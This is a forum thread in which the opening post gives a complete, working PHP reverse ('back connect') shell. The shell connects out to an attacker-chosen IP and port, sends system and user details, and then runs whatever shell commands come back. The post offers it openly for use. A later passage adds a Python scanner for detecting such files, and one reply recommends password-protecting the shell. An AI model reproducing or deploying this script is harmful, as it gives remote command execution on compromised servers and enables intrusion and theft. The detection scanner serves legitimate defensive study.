
lionaneesh 10Oct2011 02:14

Reverse Shell in PHP
 
A Back Connect Shell, also known as a Reverse Shell, is a piece of code which is used to host a shell on the server or the victim, but instead of sitting there and listening for connections (as in the case of a Bind Shell) it connects back to the attacker machine.

I already explained the difference between a Bind Shell and a Reverse Shell here.

In this tutorial we'll be making a Back Connect Shell in PHP.

Code



back-connect.php
Code: php

<?php

/*********************

@@author : lionaneesh
@@facebook : facebook.com/lionaneesh
@@Email : lionaneesh@gmail.com

********************/



ini_set('max_execution_time',0);

?>

<html>
<head>
    <title>Back Connect Shell -- PHP</title>
</head>

<body>

<h1>Welcome to Back Connect Control Panel </h1>

<p> Fill in the form Below to Start the Back Connect Service </p>

<?php
if( isset($_GET['port']) &&
    isset($_GET['ip']) &&
    $_GET['port'] != "" &&
    $_GET['ip'] != ""
    )
    {
        echo "<p>The Program is now trying to connect!</p>";
        $ip = $_GET['ip'];
        $port=$_GET['port'];
        $sockfd=fsockopen($ip , $port , $errno, $errstr );
        if($errno != 0)
        {
            echo "<font color='red'><b>$errno</b> : $errstr</font>";
        }
        else if (!$sockfd)
        {
               $result = "<p>Fatal : An unexpected error was occured when trying to connect!</p>";
        }
        else
        {
            fputs ($sockfd ,
            "\n=================================================================\n
            Back Connect in PHP\n
            Coded by lionaneesh\n
            @@author : lionaneesh
            @@facebook : facebook.com/lionaneesh
            @@Email : lionaneesh@gmail.com
            \n================================================================="
);
         $pwd = shell_exec("pwd");
         $sysinfo = shell_exec("uname -a");
         $id = shell_exec("id");
         $dateAndTime = shell_exec("time /t & date /T");
         $len = 1337;
         fputs($sockfd ,$sysinfo . "\n" );
         fputs($sockfd ,$pwd . "\n" );
         fputs($sockfd ,$id ."\n\n" );
         fputs($sockfd ,$dateAndTime."\n\n" );
         while(!feof($sockfd))
         { 
            $cmdPrompt ="(Shell)[$]> ";
            fputs ($sockfd , $cmdPrompt );
            $command= fgets($sockfd, $len);
            fputs($sockfd , "\n" . shell_exec($command) . "\n\n");
         }
         fclose($sockfd);
        }
    }
    else
    {
    ?>
    <table align="center" >
         <form method="GET">
         <td>
            <table style="border-spacing: 6px;">
                <tr>
                    <td>Port</td>
                    <td>
                        <input style="width: 200px;" name="port" value="31337" />
                    </td>
                </tr>
                <tr>
                    <td>IP </td>
                    <td><input style="width: 100px;" name="ip" size='5' value="127.0.0.1"/>
                </tr>
                <tr>
                <td>
                <input style="width: 90px;" class="own" type="submit" value="Connect back :D!"/>
                </td>
                </tr>   
                   
            </table>
         </td>
         </form>
    </tr>
    </table>
    <p align="center" style="color: red;" >Note : After clicking Submit button , The browser will start loading continuously , Dont close this window , Unless you are done!</p>
<?php
    }
?>


It's as easy as a couple of clicks to make it work and to use!

Here is a screenshot of it working:

http://imgs.g4estatic.com/reverse-sh...trol-panel.jpg

Enj0y! And Don't forget to Comment!
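
From a defender's side, the script above has a recognisable shape: an outbound `fsockopen` call combined with `shell_exec` in the same file. The Python scanner below is an added example, not part of the original post; the function lists and the names `scan_php`, `QUOTED` and `BENIGN` are assumptions made for illustration, and it flags PHP source that combines both traits while ignoring commented-out code.

```python
import re

# Function families used by back-connect.php plus close relatives (assumed list; extend as needed).
SOCKET_FUNCS = ("fsockopen", "pfsockopen", "stream_socket_client", "socket_connect")
EXEC_FUNCS = ("shell_exec", "exec", "system", "passthru", "popen", "proc_open")
REQUEST_VAR = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\b")
# Limitation: "//" or "#" inside a string literal is also treated as a comment start.
COMMENT = re.compile(r"/\*.*?\*/|(?://|#)[^\n]*", re.S)


def _call_rx(names):
    # Match shell_exec( but not curl_exec(, $obj->exec( or Foo::system(.
    return re.compile(r"(?<![\w>$:])(" + "|".join(names) + r")\s*\(", re.I)


RULES = {"socket": _call_rx(SOCKET_FUNCS), "exec": _call_rx(EXEC_FUNCS)}


def strip_comments(src):
    # Blank comments out but keep newlines so reported line numbers stay correct.
    return COMMENT.sub(lambda m: re.sub(r"[^\n]", " ", m.group()), src)


def scan_php(src):
    """Return per-category (line, name) hits and a 'suspicious' verdict."""
    hits = {"socket": [], "exec": [], "request": []}
    for lineno, line in enumerate(strip_comments(src).splitlines(), 1):
        for key, rx in RULES.items():
            hits[key] += [(lineno, m.group(1).lower()) for m in rx.finditer(line)]
        hits["request"] += [(lineno, m.group(0)) for m in REQUEST_VAR.finditer(line)]
    # A back-connect script needs both an outbound socket and command execution.
    hits["suspicious"] = bool(hits["socket"] and hits["exec"])
    return hits


# Lines quoted from the script above (not a complete program).
QUOTED = """<?php
$ip = $_GET['ip'];
$sockfd=fsockopen($ip , $port , $errno, $errstr );
$command= fgets($sockfd, $len);
fputs($sockfd , "\\n" . shell_exec($command) . "\\n\\n");
"""

# Constructed benign sample: a port check with a commented-out exec call.
BENIGN = """<?php
// shell_exec("uptime") was removed in review
$fp = fsockopen("mail.example.org", 25, $errno, $errstr, 5);
echo $fp ? "up" : "down";
"""
```

Run `scan_php()` over the contents of each `.php` file under the web root and review any file whose verdict is suspicious; the `request` hits show whether the connection target comes from user input, as it does here.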

lionaneesh 10Oct2011 17:59

Re: Reverse Shell in PHP
 
Thanks for Accepting!

Alex.Gabriel 25Oct2011 20:43

Re: Reverse Shell in PHP
 
Hi, I don't agree with the unauthorized usage of PHP on people's servers, even when your posted code is old and can be found with Google in a few seconds, but you should protect the file with a password to avoid those bots entering some viagra site as the IP. Else you can prevent Google from viewing this page ... this only if you want to restrict usage to those who know the URL to the file.

